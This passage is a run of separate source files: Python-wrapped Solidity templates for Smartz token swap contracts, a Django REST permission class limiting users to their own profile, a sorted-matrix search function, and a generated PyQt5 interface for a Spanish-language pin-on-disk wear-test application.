source, swap_type): """ Fill check transfers templates""" if 'check_transfers' in fields and fields['check_transfers']: source = source \ .replace('%check_transfers1%', self._CHECK_TRANSFER1[swap_type]) \ .replace('%check_transfers2%', self._CHECK_TRANSFER2[swap_type]) else: source = source \ .replace('%check_transfers1%', '') \ .replace('%check_transfers2%', '') return source # language=Solidity _TEMPLATE_ERC20 = """ /** * @title ERC20Basic * @dev Simpler version of ERC20 interface * @dev see https://github.com/ethereum/EIPs/issues/179 */ contract ERC20Basic { uint8 public decimals; uint256 public totalSupply; function balanceOf(address who) public view returns (uint256); function transfer(address to, uint256 value) public returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); } """ # language=Solidity _TEMPLATE_TOKENS_FOR_ETHER = """ pragma solidity ^0.4.18; %erc20_basic% /** * Copyright (C) 2018 Smartz, LLC * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied). */ /** * @title SwapTokenForEther * Swap tokens of participant1 for ether of participant2 * * @author Vladimir Khramov <[email protected]> */ contract Swap { address public participant1; address public participant2; ERC20Basic public participant1Token; uint256 public participant1TokensCount; uint256 public participant2EtherCount; bool public isFinished = false; function Swap() public payable { participant1 = %_participant1%; participant2 = %_participant2%; participant1Token = ERC20Basic(%_participant1TokenAddress%); require(participant1Token.decimals() <= 18); participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals())); participant2EtherCount = %_participant2EtherCount% ether; assert(participant1 != participant2); assert(participant1Token != address(0)); assert(participant1TokensCount > 0); assert(participant2EtherCount > 0); %payment_code% } /** * Ether accepted */ function () external payable { require(!isFinished); require(msg.sender == participant2); if (msg.value > participant2EtherCount) { msg.sender.transfer(msg.value - participant2EtherCount); } } /** * Swap tokens for ether */ function swap() external { require(!isFinished); require(this.balance >= participant2EtherCount); uint256 tokensBalance = participant1Token.balanceOf(this); require(tokensBalance >= participant1TokensCount); isFinished = true; %check_transfers1% require(participant1Token.transfer(participant2, participant1TokensCount)); if (tokensBalance > participant1TokensCount) { require( participant1Token.transfer(participant1, tokensBalance - participant1TokensCount) ); } participant1.transfer(this.balance); %check_transfers2% } /** * Refund tokens or ether by participants */ function refund() external { if (msg.sender == participant1) { uint256 tokensBalance = participant1Token.balanceOf(this); require(tokensBalance>0); participant1Token.transfer(participant1, tokensBalance); } else if (msg.sender == participant2) { require(this.balance > 0); participant2.transfer(this.balance); } else { revert(); } } /** * Tokens count sent by participant #1 */ function participant1SentTokensCount() public view returns (uint256) { return participant1Token.balanceOf(this); } /** * Ether count sent by participant #2 */ function participant2SentEtherCount() public view returns (uint256) { return this.balance; } } """ # language=Solidity _TEMPLATE_TOKENS_FOR_TOKENS = """ pragma solidity ^0.4.18; %erc20_basic% /** * Copyright (C) 2018 Smartz, LLC * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied). */ /** * @title SwapTokenForToken * Swap tokens of participant1 for tokens of participant2 * * @author Vladimir Khramov <[email protected]> */ contract Swap { address public participant1; address public participant2; ERC20Basic public participant1Token; uint256 public participant1TokensCount; ERC20Basic public participant2Token; uint256 public participant2TokensCount; bool public isFinished = false; /** * Constructor */ function Swap() public payable { participant1 = %_participant1%; participant2 = %_participant2%; participant1Token = ERC20Basic(%_participant1TokenAddress%); require(participant1Token.decimals() <= 18); participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals())); participant2Token = ERC20Basic(%_participant2TokenAddress%); require(participant2Token.decimals() <= 18); participant2TokensCount = %_participant2TokensCount% ether / 10**(18-uint256(participant2Token.decimals())); assert(participant1 != participant2); assert(participant1Token != participant2Token); assert(participant1Token != address(0)); assert(participant2Token != address(0)); assert(participant1TokensCount > 0); assert(participant2TokensCount > 0); %payment_code% } /** * No direct payments */ function() external { revert(); } /** * Swap tokens for tokens */ function swap() external { require(!isFinished); uint256 tokens1Balance = participant1Token.balanceOf(this); require(tokens1Balance >= participant1TokensCount); uint256 tokens2Balance = participant2Token.balanceOf(this); require(tokens2Balance >= participant2TokensCount); isFinished = true; %check_transfers1% require(participant1Token.transfer(participant2, participant1TokensCount)); if (tokens1Balance > participant1TokensCount) { require( participant1Token.transfer(participant1, tokens1Balance - participant1TokensCount) ); } require(participant2Token.transfer(participant1, participant2TokensCount)); if (tokens2Balance > participant2TokensCount) { require( participant2Token.transfer(participant2, tokens2Balance - participant2TokensCount) ); } %check_transfers2% } /** * Refund tokens by participants */ function refund() external { if (msg.sender == participant1) { uint256 tokens1Balance = participant1Token.balanceOf(this); require(tokens1Balance > 0); participant1Token.transfer(participant1, tokens1Balance); } else if (msg.sender == participant2) { uint256 tokens2Balance = participant2Token.balanceOf(this); require(tokens2Balance > 0); participant2Token.transfer(participant2, tokens2Balance); } else { revert(); } } /** * Tokens count sent by participant #1 */ function participant1SentTokensCount() public view returns (uint256) { return participant1Token.balanceOf(this); } /** * Tokens count sent by participant #2 */ function participant2SentTokensCount() public view returns (uint256) { return participant2Token.balanceOf(this); } } """ # language=Solidity _TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1 = """ //check transfer uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2); """ # language=Solidity _TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2 = """ //check transfer assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount); """ # language=Solidity _TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1 = """ //check transfer uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2); uint token2Participant1InitialBalance = participant2Token.balanceOf(participant1); """ # language=Solidity _TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2 = """ //check transfer assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount); assert(participant2Token.balanceOf(participant1) >= token2Participant1InitialBalance+participant2TokensCount); """
python
from django.contrib.auth import get_user_model from django.utils.translation import gettext_lazy as _ from rest_framework import permissions class ReadSelf(permissions.BasePermission): """Permits access to the (user)model instance if the user corresponds to the instance""" message = _("You may only view your own profile.") def has_permission(self, request, view): if view.action_map.get(request.method.lower(), None) == "retrieve": return request.user.is_authenticated or request.user.is_superuser return request.user.is_superuser def has_object_permission(self, request, view, obj): if view.action_map.get(request.method.lower(), None) == "retrieve": if request.method in permissions.SAFE_METHODS: if isinstance(obj, get_user_model()) and obj == request.user: return True return request.user.is_superuser
python
from __future__ import annotations def search_in_a_sorted_matrix( mat: list[list], m: int, n: int, key: int | float ) -> None: """ >>> search_in_a_sorted_matrix( ... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 5) Key 5 found at row- 1 column- 2 >>> search_in_a_sorted_matrix( ... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 21) Key 21 not found >>> search_in_a_sorted_matrix( ... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.1) Key 2.1 found at row- 1 column- 1 >>> search_in_a_sorted_matrix( ... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.2) Key 2.2 not found """ i, j = m - 1, 0 while i >= 0 and j < n: if key == mat[i][j]: print(f"Key {key} found at row- {i + 1} column- {j + 1}") return if key < mat[i][j]: i -= 1 else: j += 1 print(f"Key {key} not found") def main(): mat = [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]] x = int(input("Enter the element to be searched:")) print(mat) search_in_a_sorted_matrix(mat, len(mat), len(mat[0]), x) if __name__ == "__main__": import doctest doctest.testmod() main()
python
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'PinOnDiskMain.ui' # # Created by: PyQt5 UI code generator 5.13.2 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.setEnabled(True) MainWindow.resize(537, 700) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) MainWindow.setSizePolicy(sizePolicy) MainWindow.setMinimumSize(QtCore.QSize(537, 700)) MainWindow.setMaximumSize(QtCore.QSize(537, 700)) MainWindow.setContextMenuPolicy(QtCore.Qt.NoContextMenu) MainWindow.setAcceptDrops(False) MainWindow.setStatusTip("") MainWindow.setAutoFillBackground(True) MainWindow.setDocumentMode(False) MainWindow.setUnifiedTitleAndToolBarOnMac(False) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.horizontalLayoutWidget_3 = QtWidgets.QWidget(self.centralwidget) self.horizontalLayoutWidget_3.setGeometry(QtCore.QRect(16, 4, 501, 85)) self.horizontalLayoutWidget_3.setObjectName("horizontalLayoutWidget_3") self.gridLayout = QtWidgets.QGridLayout(self.horizontalLayoutWidget_3) self.gridLayout.setContentsMargins(0, 5, 0, 5) self.gridLayout.setSpacing(7) self.gridLayout.setObjectName("gridLayout") self.portCombo = QtWidgets.QComboBox(self.horizontalLayoutWidget_3) self.portCombo.setObjectName("portCombo") self.gridLayout.addWidget(self.portCombo, 1, 0, 1, 1) self.conectarBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_3) self.conectarBtn.setObjectName("conectarBtn") self.gridLayout.addWidget(self.conectarBtn, 1, 1, 1, 1) self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_3) self.label_3.setMaximumSize(QtCore.QSize(16777215, 15)) font = QtGui.QFont() font.setPointSize(9) font.setBold(False) font.setWeight(50) self.label_3.setFont(font) self.label_3.setObjectName("label_3") self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1) self.widget = QtWidgets.QWidget(self.horizontalLayoutWidget_3) self.widget.setMinimumSize(QtCore.QSize(26, 26)) self.widget.setMaximumSize(QtCore.QSize(26, 26)) self.widget.setStyleSheet("") self.widget.setObjectName("widget") self.labelNotConnected = QtWidgets.QLabel(self.widget) self.labelNotConnected.setGeometry(QtCore.QRect(0, 0, 26, 26)) self.labelNotConnected.setMaximumSize(QtCore.QSize(26, 26)) self.labelNotConnected.setText("") self.labelNotConnected.setPixmap(QtGui.QPixmap("icons/led-red-on.png")) self.labelNotConnected.setScaledContents(True) self.labelNotConnected.setObjectName("labelNotConnected") self.labelConnected = QtWidgets.QLabel(self.widget) self.labelConnected.setGeometry(QtCore.QRect(0, 0, 26, 26)) self.labelConnected.setMaximumSize(QtCore.QSize(26, 26)) self.labelConnected.setText("") self.labelConnected.setPixmap(QtGui.QPixmap("icons/green-led-on.png")) self.labelConnected.setScaledContents(True) self.labelConnected.setObjectName("labelConnected") self.gridLayout.addWidget(self.widget, 1, 2, 1, 1) self.gridLayout.setColumnStretch(0, 1) self.horizontalLayoutWidget_5 = QtWidgets.QWidget(self.centralwidget) self.horizontalLayoutWidget_5.setGeometry(QtCore.QRect(16, 560, 505, 41)) self.horizontalLayoutWidget_5.setObjectName("horizontalLayoutWidget_5") self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_5) self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.startBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5) self.startBtn.setEnabled(False) self.startBtn.setObjectName("startBtn") self.horizontalLayout_4.addWidget(self.startBtn) self.pauseBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5) self.pauseBtn.setEnabled(False) self.pauseBtn.setObjectName("pauseBtn") self.horizontalLayout_4.addWidget(self.pauseBtn) self.stopBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5) self.stopBtn.setEnabled(False) self.stopBtn.setObjectName("stopBtn") self.horizontalLayout_4.addWidget(self.stopBtn) self.testBtn = QtWidgets.QPushButton(self.centralwidget) self.testBtn.setEnabled(False) self.testBtn.setGeometry(QtCore.QRect(16, 528, 505, 28)) self.testBtn.setObjectName("testBtn") self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget) self.gridLayoutWidget.setGeometry(QtCore.QRect(16, 612, 505, 53)) self.gridLayoutWidget.setObjectName("gridLayoutWidget") self.gridLayout_2 = QtWidgets.QGridLayout(self.gridLayoutWidget) self.gridLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize) self.gridLayout_2.setContentsMargins(0, 0, 0, 0) self.gridLayout_2.setVerticalSpacing(0) self.gridLayout_2.setObjectName("gridLayout_2") self.progressBar = QtWidgets.QProgressBar(self.gridLayoutWidget) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.progressBar.sizePolicy().hasHeightForWidth()) self.progressBar.setSizePolicy(sizePolicy) self.progressBar.setProperty("value", 0) self.progressBar.setTextVisible(False) self.progressBar.setInvertedAppearance(False) self.progressBar.setTextDirection(QtWidgets.QProgressBar.TopToBottom) self.progressBar.setObjectName("progressBar") self.gridLayout_2.addWidget(self.progressBar, 0, 0, 1, 1) self.horizontalLayout_6 = QtWidgets.QHBoxLayout() self.horizontalLayout_6.setObjectName("horizontalLayout_6") self.progressLabel = QtWidgets.QLabel(self.gridLayoutWidget) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.progressLabel.sizePolicy().hasHeightForWidth()) self.progressLabel.setSizePolicy(sizePolicy) self.progressLabel.setScaledContents(False) self.progressLabel.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter) self.progressLabel.setObjectName("progressLabel") self.horizontalLayout_6.addWidget(self.progressLabel) spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_6.addItem(spacerItem) self.speedLabel = QtWidgets.QLabel(self.gridLayoutWidget) font = QtGui.QFont() font.setBold(False) font.setWeight(50) self.speedLabel.setFont(font) self.speedLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.speedLabel.setObjectName("speedLabel") self.horizontalLayout_6.addWidget(self.speedLabel) spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_6.addItem(spacerItem1) self.estimatedEndLabel = QtWidgets.QLabel(self.gridLayoutWidget) font = QtGui.QFont() font.setBold(False) font.setWeight(50) self.estimatedEndLabel.setFont(font) self.estimatedEndLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.estimatedEndLabel.setObjectName("estimatedEndLabel") self.horizontalLayout_6.addWidget(self.estimatedEndLabel) self.horizontalLayout_6.setStretch(0, 3) self.horizontalLayout_6.setStretch(4, 3) self.gridLayout_2.addLayout(self.horizontalLayout_6, 1, 0, 1, 1) self.tabWidget = QtWidgets.QTabWidget(self.centralwidget) self.tabWidget.setGeometry(QtCore.QRect(16, 104, 501, 417)) palette = QtGui.QPalette() brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) self.tabWidget.setPalette(palette) self.tabWidget.setAutoFillBackground(True) self.tabWidget.setStyleSheet("") self.tabWidget.setTabPosition(QtWidgets.QTabWidget.North) self.tabWidget.setTabShape(QtWidgets.QTabWidget.Rounded) self.tabWidget.setElideMode(QtCore.Qt.ElideNone) self.tabWidget.setUsesScrollButtons(True) self.tabWidget.setDocumentMode(True) self.tabWidget.setTabsClosable(False) self.tabWidget.setObjectName("tabWidget") self.widget_2 = QtWidgets.QWidget() self.widget_2.setObjectName("widget_2") self.groupBox = QtWidgets.QGroupBox(self.widget_2) self.groupBox.setEnabled(False) self.groupBox.setGeometry(QtCore.QRect(4, 8, 493, 385)) font = QtGui.QFont() font.setPointSize(-1) font.setBold(True) font.setWeight(75) self.groupBox.setFont(font) self.groupBox.setLayoutDirection(QtCore.Qt.LeftToRight) self.groupBox.setAutoFillBackground(True) self.groupBox.setStyleSheet("font-size: 14px;") self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.groupBox.setFlat(False) self.groupBox.setCheckable(False) self.groupBox.setObjectName("groupBox") self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.groupBox) self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(8, 24, 469, 353)) self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2") self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2) self.verticalLayout_3.setContentsMargins(0, 0, 0, 0) self.verticalLayout_3.setObjectName("verticalLayout_3") self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_2) font = QtGui.QFont() font.setPointSize(-1) font.setBold(False) font.setWeight(50) self.label_2.setFont(font) self.label_2.setStyleSheet("font-size: 13px") self.label_2.setObjectName("label_2") self.verticalLayout_3.addWidget(self.label_2) self.experimentNameInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2) self.experimentNameInput.setEnabled(False) self.experimentNameInput.setStyleSheet("font-size: 13px;") self.experimentNameInput.setObjectName("experimentNameInput") self.verticalLayout_3.addWidget(self.experimentNameInput) self.label = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label.setStyleSheet("font-size: 13px") self.label.setObjectName("label") self.verticalLayout_3.addWidget(self.label) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.pathInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2) self.pathInput.setEnabled(False) self.pathInput.setStyleSheet("font-size: 13px;") self.pathInput.setReadOnly(True) self.pathInput.setObjectName("pathInput") self.horizontalLayout_2.addWidget(self.pathInput) self.pathBrowseBtn = QtWidgets.QToolButton(self.verticalLayoutWidget_2) self.pathBrowseBtn.setStyleSheet("font-size: 13px;") self.pathBrowseBtn.setObjectName("pathBrowseBtn") self.horizontalLayout_2.addWidget(self.pathBrowseBtn) self.verticalLayout_3.addLayout(self.horizontalLayout_2) self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_4.setStyleSheet("font-size: 13px") self.label_4.setObjectName("label_4") self.verticalLayout_3.addWidget(self.label_4) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") self.distanciaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2) self.distanciaInput.setStyleSheet("font-size: 13px;") self.distanciaInput.setObjectName("distanciaInput") self.horizontalLayout.addWidget(self.distanciaInput) self.label_6 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_6.setStyleSheet("font-size: 13px") self.label_6.setObjectName("label_6") self.horizontalLayout.addWidget(self.label_6) self.horizontalLayout.setStretch(0, 1) self.horizontalLayout.setStretch(1, 1) self.verticalLayout_3.addLayout(self.horizontalLayout) self.label_5 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_5.setStyleSheet("font-size: 13px") self.label_5.setObjectName("label_5") self.verticalLayout_3.addWidget(self.label_5) self.horizontalLayout_3 = QtWidgets.QHBoxLayout() self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.radioCombo = QtWidgets.QComboBox(self.verticalLayoutWidget_2) self.radioCombo.setStyleSheet("font-size: 13px;") self.radioCombo.setObjectName("radioCombo") self.horizontalLayout_3.addWidget(self.radioCombo) self.label_7 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_7.setStyleSheet("font-size: 13px") self.label_7.setObjectName("label_7") self.horizontalLayout_3.addWidget(self.label_7) self.verticalLayout_3.addLayout(self.horizontalLayout_3) self.label_8 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_8.setStyleSheet("font-size: 13px") self.label_8.setObjectName("label_8") self.verticalLayout_3.addWidget(self.label_8) self.horizontalLayout_5 = QtWidgets.QHBoxLayout() self.horizontalLayout_5.setObjectName("horizontalLayout_5") self.cargaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2) self.cargaInput.setStyleSheet("font-size: 13px;") self.cargaInput.setText("") self.cargaInput.setObjectName("cargaInput") self.horizontalLayout_5.addWidget(self.cargaInput) self.label_9 = QtWidgets.QLabel(self.verticalLayoutWidget_2) self.label_9.setStyleSheet("font-size: 13px") self.label_9.setObjectName("label_9") self.horizontalLayout_5.addWidget(self.label_9) self.horizontalLayout_5.setStretch(0, 1) self.horizontalLayout_5.setStretch(1, 1) self.verticalLayout_3.addLayout(self.horizontalLayout_5) self.tabWidget.addTab(self.widget_2, "") self.tab_2 = QtWidgets.QWidget() self.tab_2.setObjectName("tab_2") self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2) self.groupBox_2.setEnabled(False) self.groupBox_2.setGeometry(QtCore.QRect(4, 8, 493, 385)) font = QtGui.QFont() font.setPointSize(-1) font.setBold(True) font.setWeight(75) self.groupBox_2.setFont(font) self.groupBox_2.setAutoFillBackground(True) self.groupBox_2.setStyleSheet("font-size: 14px;") self.groupBox_2.setObjectName("groupBox_2") self.verticalLayoutWidget = QtWidgets.QWidget(self.groupBox_2) self.verticalLayoutWidget.setGeometry(QtCore.QRect(8, 20, 465, 357)) self.verticalLayoutWidget.setObjectName("verticalLayoutWidget") self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setSpacing(0) self.verticalLayout.setObjectName("verticalLayout") self.labelOperador = QtWidgets.QLabel(self.verticalLayoutWidget) self.labelOperador.setLayoutDirection(QtCore.Qt.LeftToRight) self.labelOperador.setStyleSheet("font-size: 13px;") self.labelOperador.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.labelOperador.setObjectName("labelOperador") self.verticalLayout.addWidget(self.labelOperador) self.operarioInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.operarioInput.setStyleSheet("font-size: 13px;") self.operarioInput.setInputMask("") self.operarioInput.setText("") self.operarioInput.setObjectName("operarioInput") self.verticalLayout.addWidget(self.operarioInput) self.label_11 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_11.setStyleSheet("font-size: 13px;") self.label_11.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_11.setObjectName("label_11") self.verticalLayout.addWidget(self.label_11) self.probetaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.probetaInput.setStyleSheet("font-size: 13px;") self.probetaInput.setText("") self.probetaInput.setObjectName("probetaInput") self.verticalLayout.addWidget(self.probetaInput) self.label_12 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_12.setStyleSheet("font-size: 13px;") self.label_12.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_12.setObjectName("label_12") self.verticalLayout.addWidget(self.label_12) self.materialInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.materialInput.setStyleSheet("font-size: 13px;") self.materialInput.setText("") self.materialInput.setClearButtonEnabled(False) self.materialInput.setObjectName("materialInput") self.verticalLayout.addWidget(self.materialInput) self.label_13 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_13.setStyleSheet("font-size: 13px;") self.label_13.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_13.setObjectName("label_13") self.verticalLayout.addWidget(self.label_13) self.durezaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.durezaInput.setStyleSheet("font-size: 13px;") self.durezaInput.setText("") self.durezaInput.setObjectName("durezaInput") self.verticalLayout.addWidget(self.durezaInput) self.label_14 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_14.setStyleSheet("font-size: 13px;") self.label_14.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_14.setObjectName("label_14") self.verticalLayout.addWidget(self.label_14) self.tratamientoInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.tratamientoInput.setStyleSheet("font-size: 13px;") self.tratamientoInput.setText("") self.tratamientoInput.setObjectName("tratamientoInput") self.verticalLayout.addWidget(self.tratamientoInput) self.label_15 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_15.setStyleSheet("font-size: 13px;") self.label_15.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_15.setObjectName("label_15") self.verticalLayout.addWidget(self.label_15) self.bolillaCombo = QtWidgets.QComboBox(self.verticalLayoutWidget) self.bolillaCombo.setObjectName("bolillaCombo") self.verticalLayout.addWidget(self.bolillaCombo) self.label_16 = QtWidgets.QLabel(self.verticalLayoutWidget) self.label_16.setStyleSheet("font-size: 13px;") self.label_16.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.label_16.setObjectName("label_16") self.verticalLayout.addWidget(self.label_16) self.diametroBolillaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget) self.diametroBolillaInput.setStyleSheet("font-size: 13px;") self.diametroBolillaInput.setText("") self.diametroBolillaInput.setObjectName("diametroBolillaInput") self.verticalLayout.addWidget(self.diametroBolillaInput) self.tabWidget.addTab(self.tab_2, "") MainWindow.setCentralWidget(self.centralwidget) self.menubar = QtWidgets.QMenuBar(MainWindow) self.menubar.setGeometry(QtCore.QRect(0, 0, 537, 26)) self.menubar.setObjectName("menubar") MainWindow.setMenuBar(self.menubar) self.retranslateUi(MainWindow) self.tabWidget.setCurrentIndex(0) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "POD App")) self.conectarBtn.setText(_translate("MainWindow", "Conectar")) self.label_3.setText(_translate("MainWindow", "Seleccione el puerto del controlador")) self.startBtn.setText(_translate("MainWindow", "Empezar")) self.pauseBtn.setText(_translate("MainWindow", "Pausar")) self.stopBtn.setText(_translate("MainWindow", "Detener")) self.testBtn.setText(_translate("MainWindow", "Prueba")) self.progressLabel.setText(_translate("MainWindow", "554 de 11605 vueltas")) self.speedLabel.setText(_translate("MainWindow", "10.0 cm/s")) self.estimatedEndLabel.setText(_translate("MainWindow", "Finaliza: 13:15")) self.groupBox.setTitle(_translate("MainWindow", "Configuración del ensayo")) self.label_2.setText(_translate("MainWindow", "Nombre del experimento")) self.label.setText(_translate("MainWindow", "Seleccione carpeta de destino para guardar datos del ensayo:")) self.pathBrowseBtn.setText(_translate("MainWindow", "...")) self.label_4.setText(_translate("MainWindow", "Distancia")) self.label_6.setText(_translate("MainWindow", "m")) self.label_5.setText(_translate("MainWindow", "Radio")) self.label_7.setText(_translate("MainWindow", "mm")) self.label_8.setText(_translate("MainWindow", "Carga")) self.label_9.setText(_translate("MainWindow", "N")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.widget_2), _translate("MainWindow", "Configuración del ensayo")) self.groupBox_2.setTitle(_translate("MainWindow", "Datos del ensayo")) self.labelOperador.setText(_translate("MainWindow", "Operador")) self.operarioInput.setPlaceholderText(_translate("MainWindow", "Operador")) self.label_11.setText(_translate("MainWindow", "Probeta")) self.probetaInput.setPlaceholderText(_translate("MainWindow", "Probeta")) self.label_12.setText(_translate("MainWindow", "Material")) self.materialInput.setPlaceholderText(_translate("MainWindow", "Material")) self.label_13.setText(_translate("MainWindow", "Dureza (HV)")) self.durezaInput.setPlaceholderText(_translate("MainWindow", "Dureza")) self.label_14.setText(_translate("MainWindow", "Tratamiento")) self.tratamientoInput.setPlaceholderText(_translate("MainWindow", "Tratamiento")) self.label_15.setText(_translate("MainWindow", "Bolilla")) self.label_16.setText(_translate("MainWindow", "Diámetro de la bolilla (mm)")) self.diametroBolillaInput.setPlaceholderText(_translate("MainWindow", "Diámetro de la 